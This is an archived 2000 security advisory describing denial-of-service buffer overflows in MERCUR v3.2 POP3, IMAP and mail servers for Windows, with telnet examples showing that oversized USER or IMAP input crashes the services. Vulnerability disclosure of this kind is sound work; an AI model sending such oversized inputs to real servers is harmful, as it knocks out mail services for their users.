what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

labs35.htm

labs35.htm
Posted Mar 16, 2000
Site ussrback.com

USSR Advisory #35 - Remote / local dos overflow attack in MERCUR v3.2* Mail server, pop server, and imap server for Windows.

tags | remote, overflow, local, imap
systems | windows
SHA-256 | bc50ab174effe6cc371148796eba9cfd01035cb4c4caf8c073146c2acef6a2f4

labs35.htm

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote Multiples DoS Attacks in MERCUR v3.2* for Windows
98/NT Vulnerability

USSR Advisory Code: USSR-2000035

Release Date:
March 15, 2000

Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT

THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.


Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000 03:30:39 -0300
user (buffer)

Where [buffer] is aprox. 2000 characters.

[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
Mar 2000 03:34:09 -0300
(buffer)

Where [buffer] is aprox. 3000 characters.

Binary or source for this Exploit:

http://www.ussrback.com/

Exploit:
the Exploit, crash the remote machine service pop3 and imap


Vendor Status:
informed

Vendor Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html

Credit: USSRLABS

SOLUTION
Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c
h
http://www.ussrback.com


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBONAIJ6VRYEYcg938EQL/AgCg39j7B6rQSXUNK/MQkxlDEmg6WCQAnRey
+gdnd/4H3zK18gDRuZ/TlrzV
=UYs9
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close